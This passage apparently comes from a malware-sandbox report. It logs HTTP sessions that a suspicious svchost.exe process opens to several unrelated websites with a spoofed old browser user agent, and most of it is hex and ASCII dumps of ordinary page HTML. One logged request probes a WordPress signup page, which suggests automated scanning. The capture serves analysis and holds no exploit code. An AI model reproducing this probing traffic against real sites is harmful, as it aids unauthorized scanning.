                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC79INData Raw: 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20
                                                                                                                                                                                                                                                                          Data Ascii: v class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC80INData Raw: 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                          Data Ascii: iv class="spacer"></div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC81INData Raw: 3e 36 30 37 36 34 33 30 30 32 33 2d 20 4f 70 63 69 c3 b3 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c
                                                                                                                                                                                                                                                                          Data Ascii: >6076430023- Opcin 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC83INData Raw: 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64
                                                                                                                                                                                                                                                                          Data Ascii: ="g-contact-item"><div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</d
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC84INData Raw: 2d 63 6f 70 79 72 69 67 68 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69
                                                                                                                                                                                                                                                                          Data Ascii: -copyright"><div class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clini
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC85INData Raw: 34 63 35 0d 0a 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76
                                                                                                                                                                                                                                                                          Data Ascii: 4c5ion></div><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC86INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          20192.168.2.652825172.67.193.133443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:25 UTC1707OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: hyab.com
                                                                                                                                                                                                                                                                          2023-07-05 06:07:26 UTC1708INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:26 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=c5021e3740c078040485bf529df4f43e; path=/
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dvpbazxLlhrR1O4jBi%2BCZ9WFzbJGLnouFjZkVtykmwRq4jJFrYfOsPJs7kuRvqqyFdS76RAji1364l%2FUey0vx%2BzHhAa7a2YmSlrQnU2nLthzE3GdOv0PlwU56A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6d7b5eac3641-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:26 UTC1709INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          21192.168.2.652824172.67.193.133443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:25 UTC1708OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: hyab.com
                                                                                                                                                                                                                                                                          2023-07-05 06:07:26 UTC1708INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:26 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=518b93e3749aa6fa8d2722a3e34dccd2; path=/
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SRj5T2BNdCsA31T1E0F6CSJtEup7p6Iu1rh%2FZBJujVYgvZyDgrcXu0e9CQJ1gRkxozhA2uVNueS92WENWgCQDWCr0HY9E758ZXA0TaldWEPrfpodygQiPBZRaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6d7b5b72997a-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:26 UTC1708INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          22192.168.2.65310794.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:27 UTC1709OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:27 UTC1710INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:27 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:27 UTC1710INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          23192.168.2.653106185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:27 UTC1709OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:27 UTC1710INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:27 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:27 UTC1710INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          24192.168.2.65341283.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:27 UTC1711OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: dataform.co.uk
                                                                                                                                                                                                                                                                          2023-07-05 06:07:29 UTC1711INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                          Keep-Alive: timeout=2, max=99
                                                                                                                                                                                                                                                                          Content-Length: 49051
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                          X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:28 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2023-07-05 06:07:29 UTC1712INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                          2023-07-05 06:07:29 UTC1715INData Raw: 7d 72 65 74 75 72 6e 21 31 7d 28 6f 5b 72 5d 29 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 2c 22 66 6c 61 67 22 21 3d 3d 6f 5b 72 5d 26 26 28 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 29 3b 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 74 2e 73 75 70 70 6f 72 74 73 2e
                                                                                                                                                                                                                                                                          Data Ascii: }return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:29 UTC1723INData Raw: 34 20 30 2e 38 3b 30 2e 32 20 30 2e 36 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 38 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72
                                                                                                                                                                                                                                                                          Data Ascii: 4 0.8;0.2 0.6 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(8)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur
                                                                                                                                                                                                                                                                          2023-07-05 06:07:29 UTC1731INData Raw: 68 22 3a 22 54 79 70 65 20 74 6f 20 73 65 61 72 63 68 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6b 62 2d 73 75 70 70 6f 72 74 2f 61 73 73 65 74 73 2f 6a 73 2f 6b 62 73 2d 61 6a 61 78 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 35 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73
                                                                                                                                                                                                                                                                          Data Ascii: h":"Type to search"};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/kb-support/assets/js/kbs-ajax.min.js?ver=1.5.4'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/revs
                                                                                                                                                                                                                                                                          2023-07-05 06:07:29 UTC1739INData Raw: 69 70 74 22 3e 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 7b 76 61 72 20 6c 6f 61 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6c 6f 61 64 22 29 3b 76 61 72 20 72 65 6d 6f 76 65 4c 6f 61 64 69 6e 67 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 6f 61 64 2e 63 6c 61 73 73 4e 61 6d 65 2b 3d 22 20 6c 6f 61 64 65 72 2d 72 65 6d 6f 76 65 64 22 3b 7d 2c 35 30 30 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65
                                                                                                                                                                                                                                                                          Data Ascii: ipt">document.addEventListener("DOMContentLoaded",function(event){var load=document.getElementById("load");var removeLoading=setTimeout(function(){load.className+=" loader-removed";},500);});</script><link rel="icon" href="https://dataform.co.uk/wp-conte
